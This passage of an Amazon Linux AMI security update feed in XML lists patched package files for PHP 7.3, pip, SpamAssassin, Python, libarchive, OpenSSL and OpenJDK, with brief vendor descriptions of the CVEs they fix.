epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.13" 
release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.13" 
release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.13" 
release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.13" 
release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1340</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1340: medium priority package update for python-pip</title><issued date="2020-02-04 22:44:00" /><updated date="2020-02-07 18:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11324:
The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument.
1702473: CVE-2019-11324 python-urllib3: Certification mishandle when error should be thrown
CVE-2019-11236:
In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.
1700824: CVE-2019-11236 python-urllib3: CRLF injection due to not encoding the '\r\n' sequence leading to possible attack on internal service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11236" title="" id="CVE-2019-11236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11324" title="" id="CVE-2019-11324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python35-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python35-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python26-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python36-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python36-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python34-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python34-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1341</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1341: medium priority package update for spamassassin</title><issued date="2020-02-04 22:46:00" /><updated date="2020-02-07 18:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12420:
In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.
1784984: CVE-2019-12420 spamassassin: crafted email message can lead to DoS
CVE-2018-11805:
In Apache SpamAssassin before 3.4.3, nefarious CF files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA 3.4.3, we recommend that users should only use update channels or 3rd party .cf files from trusted places.
1784974: CVE-2018-11805 spamassassin: crafted CF files can be configured to run system commands without any output or errors
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11805" title="" id="CVE-2018-11805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12420" title="" id="CVE-2019-12420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="spamassassin" version="3.4.3" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-3.4.3-2.2.amzn1.x86_64.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.3" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-debuginfo-3.4.3-2.2.amzn1.x86_64.rpm</filename></package><package name="spamassassin" version="3.4.3" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-3.4.3-2.2.amzn1.i686.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.3" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-debuginfo-3.4.3-2.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1342</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1342: medium priority package update for python27 python35 python36</title><issued date="2020-02-10 23:33:00" /><updated date="2020-02-13 00:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16935:
The documentation XML-RPC server in Python through 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has XSS via the server_title field. This occurs in Lib/DocXMLRPCServer.py in Python 2.x, and in Lib/xmlrpc/server.py in Python 3.x. If set_server_title is called with untrusted input, arbitrary JavaScript can be delivered to clients that visit the http URL for this server.
1763229: CVE-2019-16935 python: XSS vulnerability in the documentation XML-RPC server in server_title field
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16935" title="" id="CVE-2019-16935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.131.amzn1.i686.rpm</filename></package><package 
name="python27-debuginfo" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/python35-devel-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.10" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-libs-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.10-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1343</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1343: important priority package update for libarchive</title><issued date="2020-02-17 19:38:00" /><updated date="2020-02-19 23:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18408:
archive_read_format_rar_read_data in archive_read_support_format_rar.c in libarchive before 3.4.0 has a use-after-free in a certain ARCHIVE_FAILED situation, related to Ppmd7_DecodeSymbol.
1769979: CVE-2019-18408 libarchive: use-after-free in archive_read_format_rar_read_data when there is an error in the decompression of an archive entry
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18408" title="" id="CVE-2019-18408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libarchive-devel" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="bsdtar" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-14.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1344</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1344: low priority package update for openssl</title><issued date="2020-02-17 19:39:00" /><updated date="2020-02-19 23:20:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1563:
In situations where an attacker receives automated notification of the success or failure of a decryption attempt an attacker, after sending a very large number of messages to be decrypted, can recover a CMS/PKCS7 transported encryption key or decrypt any RSA encrypted message that was encrypted with the public RSA key, using a Bleichenbacher padding oracle attack. Applications are not affected if they use a certificate together with the private RSA key to the CMS_decrypt or PKCS7_decrypt functions to select the correct recipient info to decrypt. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).
1752100: CVE-2019-1563 openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1563" title="" id="CVE-2019-1563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.151.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-static-1.0.2k-16.151.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1345</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1345: important priority package update for java-1.8.0-openjdk</title><issued date="2020-02-20 01:00:00" /><updated date="2020-02-20 01:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2659:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241 and 8u231; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791284: CVE-2020-2659 OpenJDK: Incomplete enforcement of maxDatagramSockets limit in DatagramChannelImpl (Networking, 8231795)
CVE-2020-2654:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791217: CVE-2020-2654 OpenJDK: Excessive memory usage in OID processing in X.509 certificate parsing (Libraries, 8234037)
CVE-2020-2604:
